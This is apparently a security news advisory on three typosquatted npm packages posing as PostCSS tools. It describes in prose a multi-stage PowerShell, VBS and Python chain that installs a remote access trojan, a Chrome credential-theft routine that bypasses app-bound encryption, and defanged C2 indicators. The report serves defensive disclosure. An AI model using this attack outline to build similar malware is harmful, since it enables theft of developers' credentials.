npm Typosquat Packages Drop PowerShell RAT Targeting Chrome Creds

Researchers have uncovered three malicious npm packages deploying a sophisticated Windows remote access trojan through a multi-stage infection chain. The packages impersonate PostCSS utilities—one of JavaScript's most foundational build tools with over 150 million weekly downloads.

The campaign targets developers by exploiting the trust placed in familiar package names. Unlike typical typosquatting that relies on misspellings, these packages use plausible variations that would pass a casual dependency review.

The Malicious Packages

Security researchers identified three packages published by npm user "abdrizak":

• postcss-minify-selector-parser (615 downloads)
• postcss-minify-selector (256 downloads)
• aes-decode-runner-pro (145 downloads)

The primary attack vector is postcss-minify-selector-parser, which closely mimics the legitimate postcss-selector-parser. The name sounds like it belongs in a PostCSS workflow, making it easy to overlook during code review.

Attack Chain Breakdown

The infection progresses through four distinct stages, each designed to evade detection:

Stage 1: When imported, the package executes an embedded JavaScript dropper containing an encrypted payload and an AES-256-GCM decoder. The dropper writes a PowerShell script named settings.ps1 to disk and executes it.

Stage 2: The PowerShell script downloads a ZIP archive from nvidiadriver[.]net—a domain designed to appear legitimate in network logs. The download uses curl.exe, a native Windows binary, to avoid triggering alerts on suspicious PowerShell network activity.

Stage 3: The ZIP contains a Visual Basic script (update.vbs) alongside a bundled Python runtime and compiled extension modules. The VBS script executes via wscript.exe, launching the Python components.

Stage 4: The Python loader (loader.py) activates six compiled .pyd modules that comprise the RAT's core functionality.

RAT Capabilities

The malware's modular architecture reveals its priorities. Six compiled Python extensions handle different operations:

• config.pyd: Stores C2 server configuration and constants
• api.pyd: Manages HTTP communications with the command server at 95.216.92[.]207:8080
• audiodriver.pyd: Orchestrates the main execution loop (the misleading name is intentional)
• command.pyd: Handles host profiling, VM detection, and file operations
• auto.pyd: Steals Chrome credentials with app-bound encryption bypass
• util.pyd: Manages archive creation and handling

The Chrome credential theft module is notable. Google introduced app-bound encryption in Chrome 127 to protect saved passwords. This malware includes dedicated routines to bypass that protection, targeting Chrome's Local State and Login Data databases using Windows DPAPI combined with AES-GCM and ChaCha20-Poly1305 decryption.

Developer Machines Are High-Value Targets

This campaign joins a growing list of supply chain attacks targeting developers. We've covered similar patterns with North Korean packages across multiple ecosystems and AI developer-targeted attacks.

Developer machines are attractive targets because they often contain:

• Production API keys and secrets in environment variables
• SSH keys with access to servers and repositories
• npm tokens that could publish to legitimate packages
• Access to CI/CD pipelines and deployment infrastructure

A single compromised developer machine can pivot into a much larger breach.

Indicators of Compromise

Malicious packages:

• postcss-minify-selector-parser
• postcss-minify-selector
• aes-decode-runner-pro

C2 server: 95.216.92[.]207:8080

Domain: nvidiadriver[.]net

Files created:

• settings.ps1 (PowerShell dropper)
• update.vbs (VB Script launcher)

Mitigation

Developers who installed any of these packages should immediately:

1. Uninstall the packages and remove created artifacts
2. Rotate all credentials stored on the affected machine
3. Revoke and regenerate npm tokens
4. Review repository access for unauthorized changes
5. Check for persistence mechanisms in startup folders and scheduled tasks

For organizations with security teams, consider monitoring for PowerShell scripts reaching out to nvidiadriver[.]net or connections to the C2 IP. The multi-stage nature means blocking any single component breaks the chain.